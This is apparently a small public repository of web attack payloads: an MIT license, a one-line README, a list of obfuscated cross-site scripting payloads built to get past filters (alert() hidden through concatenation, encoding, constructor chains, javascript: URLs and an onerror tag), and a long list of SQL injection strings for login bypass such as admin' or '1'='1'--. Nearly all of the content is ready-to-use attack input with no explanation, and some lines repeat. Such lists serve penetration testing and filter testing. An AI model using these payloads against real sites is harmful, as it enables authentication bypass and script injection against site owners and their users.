├── Awesome-XSS-Payloads ├── LICENSE ├── README.md └── sql-admin-bypass.txt /Awesome-XSS-Payloads: -------------------------------------------------------------------------------- 1 | Execute : http://www.webtoolkitonline.com/javascript-tester.html OR https://jsfiddle.net 2 | Per Line 3 | ------------------------------------------------------------------------------------------ 4 | 5 | [][`filter`][`constructor`](`ale`.concat(`rt\x28`.concat`0\x29`))();// 6 | eval('ale'+'rt(0)'); 7 | Function("ale"+"rt(1)")(); 8 | setTimeout('ale'+'rt(2)'); 9 | constructor.constructor("aler"+"t(3)")(); 10 | [].filter.constructor('ale'+'rt(4)')(); 11 | top["al"+"ert"](5); 12 | new Function`al\ert\`6\``; 13 | top[8680439..toString(30)](7); 14 | top[/al/.source+/ert/.source](8); 15 | top['al\x65rt'](9); 16 | setInterval('ale'+'rt(10)'); 17 | open('java'+'script:ale'+'rt(11)'); 18 | location='javascript:ale'+'rt(12)'; 19 | Set.constructor('ale'+'rt(13)')(); 20 | Set.constructor`al\x65rt\x2814\x29```; 21 | top[8680439..toString(30)](7); 22 | top[/al/.source+/ert/.source](8); 23 | top['al\x65rt'](9); 24 | setInterval('ale'+'rt(10)'); 25 | open('java'+'script:ale'+'rt(11)'); 26 | location='javascript:ale'+'rt(12)'; 27 | eval('ale'+'rt(0)'); 28 | Function("ale"+"rt(1)")(); 29 | setTimeout('ale'+'rt(2)'); 30 | constructor.constructor("aler"+"t(3)")(); 31 | [].filter.constructor('ale'+'rt(4)')(); 32 | top["al"+"ert"](5); 33 | new Function`al\ert\`6\``; 34 | </xmp><img src=x onerror=alert(1)> 35 | import('da\r\nta:text/\ecmascript\,alert%601%60') 36 | ?"> 37 | document.location=unescape("%19Jav%09asc%09ript:https ://foobar/%250Aconfirm%25281%2529") 38 | http://window.open ("http://tpc.googlesyndication.com/safeframe/1-0- …","1;25;true") 39 | atob.constructor(atob`YWxlcnQoMSk`)`` 40 | atob.constructor(atob(/YWxlcnQoMSk/.source))() 41 | window[Symbol.hasInstance]=eval 42 | atob`YWxlcnQoMSk` instanceof window 43 | location='http://\u{e01cc}\u{e01cd}\u{e01ce}\u{e01cf}\u{e01d0}\u{e01d1}\u{e01d2}\u{e01d3}\u{e01d4}\u{e01d5}google\u{e01da}\u{e01db}\u{e01dc}\u{e01dd}\u{e01de}\u{e01df}.com' 44 | document.write("al","ert(","1)","") 45 | eval(`${`${`${`${`${`a`}`}`}`}`}${`${`${`${`${`l`}`}`}`}`}${`${`${`${`${`e`}`}`}`}`}${`${`${`${`${`r`}`}`}`}`}${`${`${`${`${`t`}`}`}`}`}${`${`${`${`${`(1)`}`}`}`}`}`) 46 | ;[].constructor.prototype.join=function(){return'pwnd'};eval('alert(1)') 47 | import('data:text/javascript,alert(1)') 48 | 49 | this[Object["keys"](this)[146]](1) 50 | this[Object["keys"](this)[5]](1) 51 | &redir=javascript%3Aalert(1) 52 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Akalanka Ekanayake 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | ## My Payload Collection (XSS,SQL ...) 3 | -------------------------------------------------------------------------------- /sql-admin-bypass.txt: -------------------------------------------------------------------------------- 1 | ') or true-- 2 | ') or ('')=(' 3 | ') or 1-- 4 | ') or ('x')=(' 5 | " or true-- 6 | " or ""=" 7 | " or 1-- 8 | " or "x"=" 9 | ") or true-- 10 | ") or ("")=(" 11 | ") or 1-- 12 | ") or ("x")=(" 13 | ')) or true-- 14 | ')) or ((''))=((' 15 | ')) or 1-- 16 | ')) or (('x'))=((' 17 | '-' 18 | ' ' 19 | '&' 20 | '^' 21 | '*' 22 | ' or ''-' 23 | ' or '' ' 24 | ' or ''&' 25 | ' or ''^' 26 | ' or ''*' 27 | "-" 28 | " " 29 | "&" 30 | "^" 31 | "*" 32 | " or ""-" 33 | ' or ''=' 34 | or 1=1 35 | or 1=1-- 36 | or 1=1# 37 | or 1=1/* 38 | admin' -- 39 | admin' # 40 | admin'/* 41 | admin' or '1'='1 42 | admin' or '1'='1'-- 43 | admin' or '1'='1'# 44 | admin' or '1'='1'/* 45 | admin'or 1=1 or ''=' 46 | admin' or 1=1 47 | admin' or 1=1-- 48 | admin' or 1=1# 49 | admin' or 1=1/* 50 | admin') or ('1'='1 51 | admin') or ('1'='1'-- 52 | admin') or ('1'='1'# 53 | admin') or ('1'='1'/* 54 | admin') or '1'='1 55 | admin') or '1'='1'-- 56 | admin') or '1'='1'# 57 | admin') or '1'='1'/* 58 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 59 | admin" -- 60 | admin" # 61 | admin"/* 62 | admin" or "1"="1 63 | admin" or "1"="1"-- 64 | admin" or "1"="1"# 65 | admin" or "1"="1"/* 66 | admin"or 1=1 or ""=" 67 | admin" or 1=1 68 | admin" or 1=1-- 69 | admin" or 1=1# 70 | admin" or 1=1/* 71 | admin") or ("1"="1 72 | admin") or ("1"="1"-- 73 | admin") or ("1"="1"# 74 | admin") or ("1"="1"/* 75 | admin") or "1"="1 76 | admin") or "1"="1"-- 77 | admin") or "1"="1"# 78 | admin") or "1"="1"/* 79 | 1' or 1=1 -- - 80 | admin' or '2' LIKE '1 81 | admin' or 2 LIKE 2-- 82 | admin' or 2 LIKE 2# 83 | admin') or 2 LIKE 2# 84 | admin') or 2 LIKE 2-- 85 | admin') or ('2' LIKE '2 86 | admin') or ('2' LIKE '2'# 87 | admin') or ('2' LIKE '2'/* 88 | admin' or '1'='1 89 | admin' or '1'='1'-- 90 | admin' or '1'='1'# 91 | admin' or '1'='1'/* 92 | admin'or 1=1 or ''=' 93 | admin' or 1=1 94 | admin' or 1=1-- 95 | admin' or 1=1# 96 | admin' or 1=1/* 97 | admin') or ('1'='1 98 | admin') or ('1'='1'-- 99 | admin') or ('1'='1'# 100 | admin') or ('1'='1'/* 101 | admin') or '1'='1 102 | admin') or '1'='1'-- 103 | admin') or '1'='1'# 104 | admin') or '1'='1'/* 105 | --------------------------------------------------------------------------------